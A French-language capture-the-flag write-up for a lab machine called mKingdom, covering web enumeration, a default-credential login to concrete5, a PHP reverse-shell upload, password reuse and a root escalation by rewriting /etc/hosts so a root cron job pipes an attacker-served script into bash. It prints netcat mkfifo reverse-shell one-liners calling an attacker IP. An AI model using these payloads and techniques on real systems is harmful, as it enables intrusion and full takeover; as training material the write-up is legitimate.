mKingdom

Upload file shell sed env /etc/hosts

Nom machine : mKingdom
Difficulté : Facile
OS : Linux

Enumération

NMAP

Port 85

HTTP (85)

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://10.10.16.231:85/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_10.10.16.231_85/__24-09-12_15-14-42.txt

Target: http://10.10.16.231:85/

[15:14:42] Starting: 
[15:14:46] 403 -  290B  - /.ht_wsr.txt
[15:14:46] 403 -  293B  - /.htaccess.bak1
[15:14:46] 403 -  295B  - /.htaccess.sample
[15:14:46] 403 -  293B  - /.htaccess.save
[15:14:46] 403 -  293B  - /.htaccess.orig
[15:14:46] 403 -  291B  - /.htaccess_sc
[15:14:46] 403 -  294B  - /.htaccess_extra
[15:14:46] 403 -  291B  - /.htaccessBAK
[15:14:46] 403 -  293B  - /.htaccess_orig
[15:14:46] 403 -  291B  - /.htaccessOLD
[15:14:46] 403 -  292B  - /.htaccessOLD2
[15:14:46] 403 -  283B  - /.htm
[15:14:46] 403 -  284B  - /.html
[15:14:46] 403 -  293B  - /.htpasswd_test
[15:14:46] 403 -  289B  - /.htpasswds
[15:14:46] 403 -  290B  - /.httr-oauth
[15:14:47] 403 -  283B  - /.php
[15:14:47] 403 -  284B  - /.php3
[15:14:56] 301 -  312B  - /app  ->  http://10.10.16.231:85/app/
[15:14:56] 200 -  457B  - /app/
[15:15:13] 403 -  293B  - /server-status/
[15:15:13] 403 -  292B  - /server-status

Nous avons découvert /app. Nous y accédons et cliquons sur launch afin d'accéder au site de Toad. Un fichier robots.txt est présent.

Rien d'intéressant. Tout à la fin de la page d'acceuil : login. On clique.

Accès initial

Nous allons tester plusieurs combinaisons. admin:password fonctionne.

Nous trouvons la version du CMS dans le code source : concrete5 - 8.5.2

Concrete CMS: Remote Code Execution (Reverse Shell) - File M... - vulnerability database | Vulners.comVulners Database

Nous allons dans "Systsem & Settings" puis "Allows File Types". On ajoute php. Nous pouvons maintenant upload un shell php.

File --> upload files. Nous avons choisi le shell php de reverse shell générator. Nous avons juste à cliquer sur Properties puis de suivre l'utl indiqué. Nous avons notre shell !

Un listener netcat en écoute sur le port 1234 puis le payload envoyé :

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.9.73.224 1234 >/tmp/f

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234                   
listening on [any] 1234 ...
connect to [10.9.73.224] from (UNKNOWN) [10.10.237.142] 60356
bash: cannot set terminal process group (1385): Inappropriate ioctl for device
bash: no job control in this shell
www-data@mkingdom:/var/www/html/app/castle/application/files/3517/2617/1350$ whoami
<html/app/castle/application/files/3517/2617/1350$ whoami                    
www-data
www-data@mkingdom:/var/www/html/app/castle/application/files/3517/2617/1350$ python3 -c 'import pty;pty.spawn("/bin/bash")'

Nous sommes www-data

Elévation des privilèges

On exécute linpeas.sh. Informations intéressantes :

-rw-rw-rw- 1 www-data www-data 401 Nov 29  2023 /var/www/html/app/castle/application/config/database.php
            'database' => 'mKingdom',
            'password' => 'toadisthebest',
{...}
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 toad root 47K Mar 10  2016 /bin/cat

www-data@mkingdom:/tmp$ mysql -u toad -p
mysql -u toad -p
Enter password: toadisthebest

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 126
Server version: 5.5.62-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mKingdom           |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.30 sec)

mysql> use mysql;
use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| ndb_binlog_index          |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| servers                   |
| slow_log                  |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| user                      |
+---------------------------+
24 rows in set (0.00 sec)

mysql> select * from user;
select * from user;

mysql> select Host, User, Password from user;
select Host, User, Password from user;
+--------------+------------------+-------------------------------------------+
| Host         | User             | Password                                  |
+--------------+------------------+-------------------------------------------+
| localhost    | root             |                                           |
| mkingdom.thm | root             |                                           |
| 127.0.0.1    | root             |                                           |
| ::1          | root             |                                           |
| localhost    | debian-sys-maint | *C9395CED34FBFD12AEA49B684E680929E10601E0 |
| localhost    | toad             | *67D97D25E90A4914F673B306662641AD4010DB82 |
+--------------+------------------+-------------------------------------------+

Bien dommage, nous connaissons déjà le mot de passe de Toad. Mais par chance, le même mot de passe est utilisé sur la machine.

www-data@mkingdom:/tmp$ su toad
su toad
Password: toadisthebest

toad@mkingdom:/tmp$ whoami
whoami
toad

Nous nous rappelons du /bin/cat précédent et :

toad@mkingdom:/home$ ls -l /bin/cat
ls -l /bin/cat
-rwsr-xr-x 1 toad root 47904 Mar 10  2016 /bin/cat

toad@mkingdom:~$ env
env
APACHE_PID_FILE=/var/run/apache2/apache2.pid
XDG_SESSION_ID=c4
SHELL=/bin/bash
APACHE_RUN_USER=www-data
USER=toad
LS_COLORS=
PWD_token=aWthVGVOVEFOdEVTCg==
MAIL=/var/mail/toad
APACHE_LOG_DIR=/var/log/apache2
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
PWD=/home/toad
APACHE_RUN_GROUP=www-data
LANG=en_US.UTF-8

┌──(kali㉿kali)-[~]
└─$ echo 'aWthVGVOVEFOdEVTCg==' | base64 -d
ikaTeNTANtES

Nous avons le mot de passe de mario.

toad@mkingdom:~$ su mario
su mario
Password: ikaTeNTANtES

mario@mkingdom:/home/toad$ whoami
whoami
mario

mario@mkingdom:~$ sudo -l
sudo -l
[sudo] password for mario: ikaTeNTANtES
            
Matching Defaults entries for mario on mkingdom:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    pwfeedback

User mario may run the following commands on mkingdom:
    (ALL) /usr/bin/id

id n'est pas exploitable

Pour le flag on le copie dans /tmp afin d'avoir les droits de lectures.

mario@mkingdom:/home$ cd mario
cd mario
mario@mkingdom:~$ cp user.txt /tmp/user.txt

N'ayant rien trouvé avec linpeas nous allons tenter d'exécuter pspy afin de voir les processus qui se lance.

GitHub - DominicBreuker/pspy: Monitor linux processes without root permissionsGitHub

On attend un peu et :

024/09/12 17:01:01 CMD: UID=0     PID=23952  | bash 
2024/09/12 17:01:01 CMD: UID=0     PID=23951  | curl mkingdom.thm:85/app/castle/application/counter.sh 
2024/09/12 17:01:01 CMD: UID=0     PID=23950  | /bin/sh -c curl mkingdom.thm:85/app/castle/application/counter.sh | bash >> /var/log/up.log  
2024/09/12 17:01:01 CMD: UID=0     PID=23949  | CRON 
2024/09/12 17:01:01 CMD: UID=0     PID=23954  | bash 
2024/09/12 17:01:01 CMD: UID=0     PID=23956  | bash 
2024/09/12 17:01:01 CMD: UID=0     PID=23955  | bash

mario@mkingdom:/var/www/html/app/castle/application$ ls -l counter.sh
ls -l counter.sh
-rw-r--r-- 1 root root 129 Nov 29  2023 counter.sh
mario@mkingdom:/var/www/html/app/castle/application$ ls -l /etc/hosts
ls -l /etc/hosts
-rw-rw-r-- 1 root mario 342 Jan 26  2024 /etc/hosts

Nous pouvons changer modifier le fichier host mais non le fichier counter.sh. Nous allons modifer le premier afin de renvoyer vers notre adresse IP.

mario@mkingdom:/var/www/html/app/castle/application/files/3517/2617/1350$ cat /etc/hosts | sed 's/127\.0\.1\.1\t/10\.9\.73\.224\t\/g' > /tmp/host2
<.1\.1\tmkingdom\.thm/10\.9\.73\.224\t\tmkingdom.thm/g' > /tmp/replace_hosts 
mario@mkingdom:/var/www/html/app/castle/application/files/3517/2617/1350$ cat /tmp/host2 > /etc/hosts
<iles/3517/2617/1350$ cat /tmp/replace_hosts > /etc/hosts

Maintenant nous aller créer un chemin indentique vers counter.sh et nous allons ouvrir un server python sur le port 85.

┌──(kali㉿kali)-[~/thm/app/castle/application]
└─$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.9.73.224 1235 >/tmp/f" > counter.sh

┌──(kali㉿kali)-[~/thm]
└─$ python -m http.server 85
Serving HTTP on 0.0.0.0 port 85 (http://0.0.0.0:85/) ...
10.10.25.230 - - [12/Sep/2024 18:17:02] "GET /app/castle/application/counter.sh HTTP/1.1" 200 -
10.10.25.230 - - [12/Sep/2024 18:18:02] "GET /app/castle/application/counter.sh HTTP/1.1" 200 -

┌──(kali㉿kali)-[~/thm/app/castle/application]
└─$ nc -lnvp 1235
listening on [any] 1235 ...
connect to [10.9.73.224] from (UNKNOWN) [10.10.25.230] 50948
bash: cannot set terminal process group (2041): Inappropriate ioctl for device
bash: no job control in this shell
root@mkingdom:~# whoami
whoami
root

Nous sommes root !

PrécédentLinux SuivantPublisher v2.1

Mis à jour il y a 1 an

hashtagEnumération

hashtagNMAP

hashtagHTTP (85)

hashtagAccès initial

hashtagElévation des privilèges

Enumération

NMAP

HTTP (85)

Accès initial

Elévation des privilèges